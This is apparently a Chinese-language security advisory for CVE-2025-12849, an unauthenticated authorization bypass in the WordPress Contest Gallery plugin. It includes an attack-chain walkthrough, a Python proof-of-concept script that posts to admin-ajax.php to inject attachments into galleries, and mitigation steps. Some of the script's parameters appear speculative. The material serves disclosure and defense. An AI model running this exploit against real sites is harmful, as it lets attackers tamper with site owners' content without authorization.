CVE-2025-12849 WordPress Contest Gallery插件授权绕过漏洞

漏洞信息

漏洞编号

CVE-2025-12849

漏洞类型

授权绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Contest Gallery插件

漏洞概述

CVE-2025-12849是WordPress Contest Gallery插件中的一个授权绕过（Authorization Bypass）漏洞。该插件在所有版本直至28.0.2都存在此安全问题。漏洞的根本原因在于插件注册了`cg_check_wp_admin_upload_v10` AJAX操作，该操作对已认证和未认证用户都开放，但缺少必要的能力检查（capability checks）和随机数验证（nonce verification）。这意味着任何未认证的攻击者都可以利用这个端点，将任意的WordPress媒体附件注入到画廊中，并修改画廊的元数据。值得注意的是，该漏洞不允许攻击者实际移动或上传文件，但已足以破坏画廊内容的完整性和引入恶意媒体资源。由于该漏洞无需认证即可利用，且攻击复杂度低，因此对使用该插件的WordPress网站构成了实际威胁。CVSS 3.1评分5.3分（中等严重程度），主要影响在于完整性方面的低级别影响。

技术细节

该漏洞属于WordPress插件常见的授权绕过问题。在WordPress中，AJAX操作通常需要通过`wp_ajax_`（已认证用户）和`wp_ajax_nopriv_`（未认证用户）钩子注册。Contest Gallery插件错误地为`cg_check_wp_admin_upload_v10`动作同时注册了两类钩子，允许未认证用户访问本应需要管理权限的功能。具体问题点包括：1) 缺少`current_user_can()`权限检查；2) 缺少`wp_verify_nonce()`随机数验证；3) 直接处理用户可控的输入数据。攻击者利用此漏洞可以：1) 通过AJAX端点`wp-admin/admin-ajax.php`调用`cg_check_wp_admin_upload_v10`动作；2) 提交精心构造的请求，将已有媒体库中的附件ID注入到指定画廊；3) 修改画廊的元数据（如标题、描述、配置参数）。由于不涉及文件上传，传统的文件上传限制对此无效。攻击者需要了解目标画廊的ID和有效的媒体附件ID，但这可以通过公开的画廊页面或API枚举获得。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否使用Contest Gallery插件（通过页面源码、wappalyzer或直接访问插件路径）

STEP 2

步骤2

攻击者枚举目标画廊ID，可通过访问画廊页面或探测API端点获取有效的gallery_id参数

STEP 3

步骤3

攻击者准备要注入的媒体附件ID，可以是已有的媒体库附件或通过其他方式获取的有效attachment_id

STEP 4

步骤4

攻击者构造恶意HTTP POST请求到/wp-admin/admin-ajax.php，动作参数设置为cg_check_wp_admin_upload_v10

STEP 5

步骤5

请求中包含gallery_id、attachment_id等参数，由于缺少nonce验证和权限检查，请求被服务器接受

STEP 6

步骤6

插件将指定的媒体附件ID写入目标画廊的数据库记录中，完成恶意内容的注入

STEP 7

步骤7

攻击者可通过画廊页面验证注入效果，恶意媒体附件已成功关联到目标画廊

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-12849 PoC - Contest Gallery Authorization Bypass
# Target: WordPress site with Contest Gallery plugin <= 28.0.2

TARGET_URL = "http://target-wordpress-site.com"
GALLERY_ID = 1  # Target gallery ID (enumeration required)
ATTACHMENT_ID = 123  # Valid media attachment ID to inject

def exploit_cg_auth_bypass():
    """
    Exploits the authorization bypass vulnerability in Contest Gallery plugin.
    This allows unauthenticated attackers to inject media attachments into galleries.
    """
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Build the exploit request
    data = {
        'action': 'cg_check_wp_admin_upload_v10',
        'gallery_id': GALLERY_ID,
        'attachment_id': ATTACHMENT_ID,
        # Additional parameters may be required based on plugin version
        'cg_step': 'insert_attachment',
        'cg_override_gallery': 'true'
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        
        print(f"[*] Sending malicious request to {endpoint}")
        print(f"[*] Target Gallery ID: {GALLERY_ID}")
        print(f"[*] Attachment ID: {ATTACHMENT_ID}")
        print(f"[*] Response Status: {response.status_code}")
        
        if response.status_code == 200:
            print(f"[*] Response: {response.text[:500]}")
            
            # Check if injection was successful
            if 'success' in response.text.lower() or '1' in response.text:
                print("[+] Exploitation appears successful!")
                print("[+] Malicious attachment injected into gallery")
            else:
                print("[-] Response does not indicate successful exploitation")
        else:
            print(f"[-] Unexpected HTTP status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12849 - Contest Gallery Auth Bypass Exploit")
    print("=" * 60)
    exploit_cg_auth_bypass()

影响范围

WordPress Contest Gallery插件 <= 28.0.2（所有版本）

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制或禁用wp-admin/admin-ajax.php的公开访问，通过Nginx或Apache配置仅允许已认证用户访问；2) 使用WordPress防火墙插件添加针对该AJAX动作的临时规则；3) 监控访问日志，查找大量针对admin-ajax.php的异常请求；4) 考虑使用云WAF服务（如Cloudflare、AWS WAF等）添加速率限制和访问控制；5) 如果暂时不需要画廊功能，可禁用Contest Gallery插件以消除攻击面。